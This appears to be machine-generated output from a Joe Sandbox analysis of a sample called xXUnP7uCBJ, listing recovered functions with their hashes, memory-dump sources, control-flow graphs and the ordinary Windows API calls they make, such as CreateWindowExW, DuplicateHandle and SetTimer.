                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a04e0f06650626f7a20aa01630c869948be53529f7f8dc2dea6e775f0451882
                                                                                                              • Instruction ID: 0589acdc3f5f21b29a7d9d40263a21f7f5203834680bf2cd2c8a1e334565cb36
                                                                                                              • Opcode Fuzzy Hash: 9a04e0f06650626f7a20aa01630c869948be53529f7f8dc2dea6e775f0451882
                                                                                                              • Instruction Fuzzy Hash: F481C674E04249CBEB14DFA9C95069DBBF2FF88314F249129D818AB369DB359942CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 117b982856792f80b44bc4ea6c322c0a0b2818d3e60303eb154cbe25d7bc7c98
                                                                                                              • Instruction ID: 7b4138d37e42de22fe56a883dd04930ba6e59b61f495dfe649a09651123adfe6
                                                                                                              • Opcode Fuzzy Hash: 117b982856792f80b44bc4ea6c322c0a0b2818d3e60303eb154cbe25d7bc7c98
                                                                                                              • Instruction Fuzzy Hash: E971C275D01228CFEB64DF66C9907DDBBB2BF89300F1094AAD808A7360DB355A82CF40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d5115a6fa9753d4c818ec7e1b443a8c8ade88e47766d3d6d25df93064a7257cc
                                                                                                              • Instruction ID: 93b880df3a40d4c40c3d200eff19f8a156ffd9b9be2894b1eda9fdf4bd2a3511
                                                                                                              • Opcode Fuzzy Hash: d5115a6fa9753d4c818ec7e1b443a8c8ade88e47766d3d6d25df93064a7257cc
                                                                                                              • Instruction Fuzzy Hash: AD7195B4E016288FEB58CF66C944B9EFBF2AF89300F14C1AAD40CA7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 26d51bdc85f098127088e9e90e77db8088b67a96f246066847085ad705e5b253
                                                                                                              • Instruction ID: ec65db42f11ed310acc30486c0b557f349cf58854b1bdc3be2b9e5969683da5f
                                                                                                              • Opcode Fuzzy Hash: 26d51bdc85f098127088e9e90e77db8088b67a96f246066847085ad705e5b253
                                                                                                              • Instruction Fuzzy Hash: FE71A3B4E002188FEB68CF66C955B9EFBF2AF88304F14D1AAD40CA7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3d1b545c83a7e55ff20fc0b0b02405d287785855b7bf896bb45adfe946397f1
                                                                                                              • Instruction ID: 85a7c32db4509d39affd290c95465676c8ce31c4580c426fe0269b4ad86507f3
                                                                                                              • Opcode Fuzzy Hash: e3d1b545c83a7e55ff20fc0b0b02405d287785855b7bf896bb45adfe946397f1
                                                                                                              • Instruction Fuzzy Hash: 8B61E434E40258DFEB25DFA4C855BADBB72FB88301F5084AA990A77354DB355E82EF10
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d6f290128629ab23aa70b0038530806a32ab046a43d032be444439950df233c9
                                                                                                              • Instruction ID: b3a7c250f3c0b49bc61db5c4b8d28847a7527c78995223c4e0ff6f312ad033d1
                                                                                                              • Opcode Fuzzy Hash: d6f290128629ab23aa70b0038530806a32ab046a43d032be444439950df233c9
                                                                                                              • Instruction Fuzzy Hash: EB416AB1E016189BEB58CF6BCD5578AFAF3AFC9304F04C0AAD40CA6264DB750986CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: da5fe820384e66bd3049a83a61aab0d552a54683633d6a8729504c97f0e95680
                                                                                                              • Instruction ID: 57e7f2ff697c97e4f948da599285bf94f2b71ae97bd92e030cd5ba0dc7e3f715
                                                                                                              • Opcode Fuzzy Hash: da5fe820384e66bd3049a83a61aab0d552a54683633d6a8729504c97f0e95680
                                                                                                              • Instruction Fuzzy Hash: DC4158B1E016189FEB58CF6BCD4578AFAF3AFC9304F14C1AAD50CA6264DB740A858F50

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 39A909FE
                                                                                                              • GetCurrentThread.KERNEL32 ref: 39A90A3B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 39A90A78
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 39A90AD1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: d95f425595eb0eadbb2808af25814cbfbcb265fbdd91d65ae86e9acc3b068aef
                                                                                                              • Instruction ID: e5b856ec757b562a6973639ce35ea8c6f11aa2d22530bb80e9a6404e3282617c
                                                                                                              • Opcode Fuzzy Hash: d95f425595eb0eadbb2808af25814cbfbcb265fbdd91d65ae86e9acc3b068aef
                                                                                                              • Instruction Fuzzy Hash: 4E5145B0A1030A8FDB04DFAAC544BDEBBF5BF88310F208559E519B7261DB35A944CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 574 170b29-170b4a 575 170b51-170ba6 call 1707b4 574->575 576 170b4c 574->576 584 170bab-170bae call 170ec8 575->584 576->575 585 170bb4-170c7b call 1707b4 * 4 584->585 606 170c86-170c94 585->606 607 170c9d-170ca6 606->607 608 170cae-170cc6 call 1717b8 607->608 639 170cc9 call 171a40 608->639 640 170cc9 call 1719aa 608->640 641 170cc9 call 1719b8 608->641 610 170ccf-170cd5 642 170cd8 call 172c78 610->642 643 170cd8 call 172c88 610->643 611 170cde-170cea call 173168 612 170cf0-170d05 611->612 614 170d0e-170d1a call 174328 612->614 615 170d20-170e88 614->615 639->610 640->610 641->610 642->611 643->611
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P*m6$t"m6
                                                                                                              • API String ID: 0-814960161
                                                                                                              • Opcode ID: a0cc32ad9fd3f228a82bf3a48f445746366f4664c72993ec77717cb90d7b319d
                                                                                                              • Instruction ID: 9145ea236651773b98c534419dbecec88132be323b9678f40195eb791742fe3f
                                                                                                              • Opcode Fuzzy Hash: a0cc32ad9fd3f228a82bf3a48f445746366f4664c72993ec77717cb90d7b319d
                                                                                                              • Instruction Fuzzy Hash: CBA1C774E50319DFDB04DFA8D9A6A9DBBB1FB88301B104229E806B7365DB746946CF80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 647 170b30-170b4a 648 170b51-170cc6 call 1707b4 call 170ec8 call 1707b4 * 4 call 1717b8 647->648 649 170b4c 647->649 712 170cc9 call 171a40 648->712 713 170cc9 call 1719aa 648->713 714 170cc9 call 1719b8 648->714 649->648 683 170ccf-170cd5 715 170cd8 call 172c78 683->715 716 170cd8 call 172c88 683->716 684 170cde-170d1a call 173168 call 174328 688 170d20-170e88 684->688 712->683 713->683 714->683 715->684 716->684
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: P*m6$t"m6
                                                                                                              • API String ID: 0-814960161
                                                                                                              • Opcode ID: b4af2c39f2c1329762181affb8466e8daf0c9fbdb1df6ffe4679ead400600d81
                                                                                                              • Instruction ID: 98128b5db65a640d0b309b68104c8551efca217fec202a1039497f50baaf1a34
                                                                                                              • Opcode Fuzzy Hash: b4af2c39f2c1329762181affb8466e8daf0c9fbdb1df6ffe4679ead400600d81
                                                                                                              • Instruction Fuzzy Hash: D1A1D774E50309EFDB04DFA8D8A6A9DBBB1FB88301B104229E805B7365DB746D06CF80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1276 39a90104-39a90176 1277 39a90178-39a9017e 1276->1277 1278 39a90181-39a90188 1276->1278 1277->1278 1279 39a9018a-39a90190 1278->1279 1280 39a90193-39a90232 CreateWindowExW 1278->1280 1279->1280 1282 39a9023b-39a90273 1280->1282 1283 39a90234-39a9023a 1280->1283 1287 39a90280 1282->1287 1288 39a90275-39a90278 1282->1288 1283->1282 1289 39a90281 1287->1289 1288->1287 1289->1289
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39A90222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: eadb139f4287ae1bde0d59eca99c4ec4c1790bc279d8ed4659895a3cfbd0d500
                                                                                                              • Instruction ID: fd3986392f7f4bdbf8b77f85a5e3dba131789b79cb458127eb77480ab3968a9d
                                                                                                              • Opcode Fuzzy Hash: eadb139f4287ae1bde0d59eca99c4ec4c1790bc279d8ed4659895a3cfbd0d500
                                                                                                              • Instruction Fuzzy Hash: 7E51B0B5D10319DFDB14CF9AC880ADEBBB5FF48750F24822AE918AB210D7719985CF91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1290 39a90110-39a90176 1291 39a90178-39a9017e 1290->1291 1292 39a90181-39a90188 1290->1292 1291->1292 1293 39a9018a-39a90190 1292->1293 1294 39a90193-39a90232 CreateWindowExW 1292->1294 1293->1294 1296 39a9023b-39a90273 1294->1296 1297 39a90234-39a9023a 1294->1297 1301 39a90280 1296->1301 1302 39a90275-39a90278 1296->1302 1297->1296 1303 39a90281 1301->1303 1302->1301 1303->1303
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 39A90222
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 512d6d5ac314e2355cf623e72ea8234cc8fa22f122b6e68113240bb8e1f1cfa7
                                                                                                              • Instruction ID: 7586e02a18b954d7123fca1c7568414532ddc90882d81fab83f85cd663ec30a6
                                                                                                              • Opcode Fuzzy Hash: 512d6d5ac314e2355cf623e72ea8234cc8fa22f122b6e68113240bb8e1f1cfa7
                                                                                                              • Instruction Fuzzy Hash: C741B0B5D10319DFDB14CF9AC880ADEBBF5BF48750F60822AE918AB210D771A941CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1304 39a91dc0-39a91dfc 1305 39a91eac-39a91ecc 1304->1305 1306 39a91e02-39a91e07 1304->1306 1312 39a91ecf-39a91edc 1305->1312 1307 39a91e09-39a91e40 1306->1307 1308 39a91e5a-39a91e92 CallWindowProcW 1306->1308 1315 39a91e49-39a91e58 1307->1315 1316 39a91e42-39a91e48 1307->1316 1309 39a91e9b-39a91eaa 1308->1309 1310 39a91e94-39a91e9a 1308->1310 1309->1312 1310->1309 1315->1312 1316->1315
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 39A91E81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: 7ca4d7393b45a1168af3a9cfb2dccec10c905ea3e657d00d86409a8f0c77da20
                                                                                                              • Instruction ID: aa8e41cb3dafd67545dc81831e1a6f7cd8dafa0fc77be78770f31244a68b866c
                                                                                                              • Opcode Fuzzy Hash: 7ca4d7393b45a1168af3a9cfb2dccec10c905ea3e657d00d86409a8f0c77da20
                                                                                                              • Instruction Fuzzy Hash: 8C4117B8A10309CFDB14CF99C844AABBBF5FF88714F248559D519AB321D774A841CFA0

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1426 39a9d3e8-39a9d3ed 1427 39a9d399-39a9d3b2 1426->1427 1428 39a9d3ef-39a9d452 OleInitialize 1426->1428 1435 39a9d3ca-39a9d3d1 1427->1435 1436 39a9d3b4-39a9d3b6 call 39a9c560 1427->1436 1430 39a9d45b-39a9d478 1428->1430 1431 39a9d454-39a9d45a 1428->1431 1431->1430 1438 39a9d3db-39a9d3df 1435->1438 1439 39a9d3d3-39a9d3da 1435->1439 1440 39a9d3bb-39a9d3c4 1436->1440 1440->1435 1441 39a9d3c6 1440->1441 1441->1435
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 39A9D445
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: c6b2b82244a299176a07f4588674aba7aaf889c445120c5ac07ebaafe4f1eb8f
                                                                                                              • Instruction ID: 29327c032d2a412994dec0cc89f3bd86e84abd2c94818a3da037f8407d766964
                                                                                                              • Opcode Fuzzy Hash: c6b2b82244a299176a07f4588674aba7aaf889c445120c5ac07ebaafe4f1eb8f
                                                                                                              • Instruction Fuzzy Hash: B3215A759103498FDB20CFA9C5457DBBBF8FB89B15F10455DE849A7210C3B9A484CBA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1442 39a90bc0-39a90c5c DuplicateHandle 1443 39a90c5e-39a90c64 1442->1443 1444 39a90c65-39a90c82 1442->1444 1443->1444
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39A90C4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: af5b93f859cc99b09fd8314b6189001a4ebce71ad08ef13e641e61d23557ca24
                                                                                                              • Instruction ID: bb3ef4b67cdae22a219a3e3ec9e01248f53c28a774b5bec34e6568ed6d92bc7e
                                                                                                              • Opcode Fuzzy Hash: af5b93f859cc99b09fd8314b6189001a4ebce71ad08ef13e641e61d23557ca24
                                                                                                              • Instruction Fuzzy Hash: FD21E3B5900219EFDB10CFAAD984AEEBBF4FB48710F14841AE958A3350C374A950DFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1447 39a90bc8-39a90c5c DuplicateHandle 1448 39a90c5e-39a90c64 1447->1448 1449 39a90c65-39a90c82 1447->1449 1448->1449
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 39A90C4F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: f742ff6733e69e9c56c7cc00b1441ff6d1f19808792fb9b4841e53b4d2aa63c1
                                                                                                              • Instruction ID: 88c6fd24a067083ca8cf9c63af9a14bd16506b574dd809c19bd621d84a40812c
                                                                                                              • Opcode Fuzzy Hash: f742ff6733e69e9c56c7cc00b1441ff6d1f19808792fb9b4841e53b4d2aa63c1
                                                                                                              • Instruction Fuzzy Hash: CD21E4B59003199FDB10CFAAD984ADEFBF8FB48720F14801AE958A3310D374A950CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1463 39a92018-39a9208a SetTimer 1465 39a9208c-39a92092 1463->1465 1466 39a92093-39a920a7 1463->1466 1465->1466
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Timer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2870079774-0
                                                                                                              • Opcode ID: a1a713bef3c1cc475ffaa5e40f7ee8325bb38696d40995b2d0a63e7f058ffc81
                                                                                                              • Instruction ID: 993bd4662f3ce1a62b9761a788cdd339979e43141c1e94d72b1c0f998e595e2e
                                                                                                              • Opcode Fuzzy Hash: a1a713bef3c1cc475ffaa5e40f7ee8325bb38696d40995b2d0a63e7f058ffc81
                                                                                                              • Instruction Fuzzy Hash: 4A11F5B5900349DFDB10DF9AD884BDEBBF8FB48720F108419E958A7240C375A984CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1468 39a9c560-39a9d452 OleInitialize 1470 39a9d45b-39a9d478 1468->1470 1471 39a9d454-39a9d45a 1468->1471 1471->1470
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 39A9D445
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: 84745e236f4c24bfe6c62dca12a1e60b9d262c756ddfd1afd44899f08b24f648
                                                                                                              • Instruction ID: 4c3b2e9611b1608c0c7ba0ab14898ad9366d0a688d0e4ec203cdbc3c2c984209
                                                                                                              • Opcode Fuzzy Hash: 84745e236f4c24bfe6c62dca12a1e60b9d262c756ddfd1afd44899f08b24f648
                                                                                                              • Instruction Fuzzy Hash: 2F1103B5904749CFDB10DFAAC944BDEBBF4EB88620F208459E658A7200C775A980CFA5
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,39A9D92F), ref: 39A9E765
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: 712e956a35e306015bdf032f971f0be24d69b216e4172da2b111a7ce759b484d
                                                                                                              • Instruction ID: b431e72dfaca96d2592eed5a3406040a4e9372b1328b1589d8fc2fa20ce8a7c1
                                                                                                              • Opcode Fuzzy Hash: 712e956a35e306015bdf032f971f0be24d69b216e4172da2b111a7ce759b484d
                                                                                                              • Instruction Fuzzy Hash: D91113B5D04349DFDB10CF9AD844BDEFBF4AB48710F10851AD918A3200C378A540CFA6
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,39A9D92F), ref: 39A9E765
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: b74641dd24f5b667fe01ee0ab09aafa1c3635eb596c2b2c0faad82c5f16f5206
                                                                                                              • Instruction ID: 9a6e5baa2a12519a62fe59a9e87375367bb6bf76447a403c537eaf8a6ec64cd9
                                                                                                              • Opcode Fuzzy Hash: b74641dd24f5b667fe01ee0ab09aafa1c3635eb596c2b2c0faad82c5f16f5206
                                                                                                              • Instruction Fuzzy Hash: 2E11F2B5E00249CFDB10CF9AD944BDEFBF0BB48714F208569D468A7650C379A145CFA5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Timer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2870079774-0
                                                                                                              • Opcode ID: 67b7f3b8c6436f76f29fabe63be9d8f89852c777b9a908d17e504e2d48b9c5fc
                                                                                                              • Instruction ID: 9d68edf8976823ccab0d07b515f538a9acaeffa22160a38939865b4099518832
                                                                                                              • Opcode Fuzzy Hash: 67b7f3b8c6436f76f29fabe63be9d8f89852c777b9a908d17e504e2d48b9c5fc
                                                                                                              • Instruction Fuzzy Hash: A611C2B59003499FDB10DF9AD885BDEBBF8EB48720F108419D958A7610C375A984CFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: vNZ6
                                                                                                              • API String ID: 0-2600116433
                                                                                                              • Opcode ID: 4e16f7d27a27cb2d80c909fde472309e59133f1dc319e478f67779f8a719c05b
                                                                                                              • Instruction ID: d58c5d0fb4ce27f9161d01dd2ee6ecdc811fe626407cfb520f3eb0eeae583592
                                                                                                              • Opcode Fuzzy Hash: 4e16f7d27a27cb2d80c909fde472309e59133f1dc319e478f67779f8a719c05b
                                                                                                              • Instruction Fuzzy Hash: E1911431A446059FC711CF28D8885AABBB1FF85320B15C6A7E85CDB352CB31E916CBA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: )R9
                                                                                                              • API String ID: 0-3410742215
                                                                                                              • Opcode ID: bc28ab13acf4e16f53504a97a6eb4a4dfa9c93074d1fe13f1a469731fd204896
                                                                                                              • Instruction ID: 38e941212a0957c769d24fea222788a58684d747b9d7a4b13b35c840f3e2fc4c
                                                                                                              • Opcode Fuzzy Hash: bc28ab13acf4e16f53504a97a6eb4a4dfa9c93074d1fe13f1a469731fd204896
                                                                                                              • Instruction Fuzzy Hash: 53515F70E002499FCB05EFA8D861AEEBBB2FF89300F1085A9D445BB265DB359D45CF91
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: pu6Hu6
                                                                                                              • API String ID: 0-1584208818
                                                                                                              • Opcode ID: d43e53984dda631f9f8442cb4db66ea4eaad590db3853996c1739b106df1a9ef
                                                                                                              • Instruction ID: a792677beb9095bcd62abafaea7603ad65acbb8636935c4e08eb5f1939b5bdf5
                                                                                                              • Opcode Fuzzy Hash: d43e53984dda631f9f8442cb4db66ea4eaad590db3853996c1739b106df1a9ef
                                                                                                              • Instruction Fuzzy Hash: B4217C70E412489FDB09DFA5D558AEEBFB6AF48300F248069E416B7290DB34D985DF60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e789cf49a591da06cbc594ce29095420e2261a71c63b19728d6ce8d30167f497
                                                                                                              • Instruction ID: b273c47d0dd2dbd2abb90671384fa0fe6b2a53b96fd398e3ee6b33bc4c70e247
                                                                                                              • Opcode Fuzzy Hash: e789cf49a591da06cbc594ce29095420e2261a71c63b19728d6ce8d30167f497
                                                                                                              • Instruction Fuzzy Hash: 9B52D41661E3D28BDB334BB05CF81D5BFB09E061217694BDEC0C96A483DA9A47DAC353
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
